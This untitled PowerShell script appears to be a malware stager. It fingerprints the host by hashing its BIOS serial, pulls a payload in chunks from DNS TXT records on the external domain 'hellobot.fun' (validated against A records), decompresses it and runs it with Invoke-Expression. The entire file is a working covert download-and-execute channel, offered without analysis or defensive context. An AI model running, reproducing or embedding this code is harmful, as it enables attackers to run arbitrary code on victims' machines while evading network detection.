Untitled

function Pick-Domain {
    Param($DomainList)
    if ($DomainList.count -eq 1) {
        return $DomainList
    }
    return $DomainList[(Get-Random -Maximum ([array]$DomainList).count)]
}

function Identify-Machine() {
    $serial = Get-WmiObject Win32_BIOS | Select -ExpandProperty SerialNumber
    $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
    $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($serial)) |  foreach { $_.ToString("X2") }) -join ""

    return $hash.Substring(0, 10)
}

function Try-Domains {
    [CmdletBinding()]

    param([Parameter(ValueFromPipeline)]$DomainList, [Parameter()][scriptblock]$Action)

    if ($DomainList.count -eq 0) {
        Throw "No domains"
    }

    $domain = Pick-Domain($DomainList)
    try {
        return $Action.Invoke($domain)
    } catch {
        return Try-Domains ($DomainList | Where-Object { $_ –ne $domain }) $Action
    }
}

function Do-DNS {
    [CmdletBinding()]
    param([Parameter()]$dns, [Parameter()]$type)

    Write-Debug "[DNS] (${type}) ==> ${dns}"
    # DEBUG DEBUG DEBUG
    #Write-Host $type
    try {
        $data = Resolve-DnsName -Type $type $dns -ErrorAction Stop -DnsOnly -Debug:$false
        return $data
    } catch {
        Write-Host $Error[0]
    }
}

function Do-DNS-TXT {
    [CmdletBinding()]
    param([Parameter()]$dns, [Parameter()]$type)

    return (Do-DNS $dns $type | Select -ExpandProperty Strings) -join ''
}

function Download-Stage {
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)]$DomainList)
    $stage = ''
    $domain = Pick-Domain $DomainList
    $partStage = 0
    $dns = "$(Identify-Machine).stage.$partStage.$domain"
    $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
    while ($dnsResponseA -ne '0.0.0.0') {
        $bigInt = Ip-To-Long $dnsResponseA
        $bin = To-Bin-Number $bigInt

        $dnsResponseTXT = (Do-DNS $dns TXT | Select -ExpandProperty Strings) -join ''
        $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
        $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($dnsResponseTXT)) |  foreach { $_.ToString("X2") }) -join ""
        $txtHex = [string]$hash[0] + [string]$hash[1] + [string]$hash[2] + [string]$hash[3] + [string]$hash[4] + [string]$hash[5] + [string]$hash[6] + [string]$hash[7]
        $txtInt = Hex-To-Int $txtHex
        $txtBin = To-Bin-Number $txtInt

        if ([string]$bin -eq [string]$txtBin) {
            $stage += $dnsResponseTXT
            $domain = Pick-Domain $DomainList
            $partStage++
        }
        $dns = "$(Identify-Machine).stage.$partStage.$domain"
        $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
    }

    return [string]$stage
}

function Hex-To-Int{
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)]$Hex)

    $length = "$Hex".Length
    $mainLength = $length
    [bigint]$decimal = 0
    while ($length -ne 0) {
        $length--
        $liter = [string]$Hex[$length]
        if ($liter -eq "A"){
            $liter = 10
        }
        if ($liter -eq "B"){
            $liter = 11
        }
        if ($liter -eq "C"){
            $liter = 12
        }
        if ($liter -eq "D"){
            $liter = 13
        }
        if ($liter -eq "E"){
            $liter = 14
        }
        if ($liter -eq "F"){
            $liter = 15
        }
        $liter = [int]$liter
        $power = power 16 ($mainLength - $length - 1)
        $decimal += [bigint]($liter * $power)
    }
    return $decimal
}

function power{
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)]$num1, [Parameter(ValueFromPipeline)]$num2)
    return [Math]::Pow($num1, $num2)
}

function To-Bin-Number{
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)]$Number)
    $tmp = ''

    $binNumber_ = ''
    $myNumber = $Number
    DO {
    $tmp = $myNumber % 2
    $binNumber = [string]$tmp + [string]$binNumber

    $myNumber = [bigint]($myNumber / 2)
    } WHILE ($myNumber -ne 0)

    return $binNumber
}

function Ip-To-Long {
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)]$ip)
    $ipParts = "$ip".Split(".")
    $a = [bigint]([int]$ipParts[0] * 16777216)
    $b = [bigint]([int]$ipParts[1] * 65536)
    $c = [bigint]([int]$ipParts[2] * 256)
    $d = $ipParts[3]
    $base10IP = $a + $b + $c + $d
    return $base10IP
}

function Long-To-Ip{
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)]$long)
    $a = [bigint]([bigint]$long / 16777216) % 256
    $b = [bigint]([bigint]$long / 65536) % 256
    $c = [bigint]([bigint]$long / 256) % 256
    $d = [bigint]([bigint]$long) % 256
    return [string]$a + '.' + [string]$b + '.' + [string]$c + '.' + [string]$d
}

function Decode-String {
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)]$Code)

    $gzipBytes = [System.Convert]::FromBase64String($Code)
    $codeBytes = Get-DecompressedByteArray($gzipBytes)
    return [system.Text.Encoding]::UTF8.GetString($codeBytes)
}

# =============================================================================

function Get-DecompressedByteArray {

	[CmdletBinding()]
    Param (
		[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
        [byte[]] $byteArray = $(Throw("-byteArray is required"))
    )
	Process {
	    Write-Verbose "Get-DecompressedByteArray"
        $input = New-Object System.IO.MemoryStream( , $byteArray )
	    $output = New-Object System.IO.MemoryStream
        $gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
	    $gzipStream.CopyTo( $output )
        $gzipStream.Close()
		$input.Close()
		[byte[]] $byteOutArray = $output.ToArray()
        Write-Output $byteOutArray
    }
}

# =============================================================================

$domains = @("hellobot.fun")
try {
    $stage = Download-Stage($domains) | Decode-String
    Invoke-Expression $stage
} catch {
    Write-Debug "[Main] General failure"
    Write-Host $Error[0]
    # do nothing
}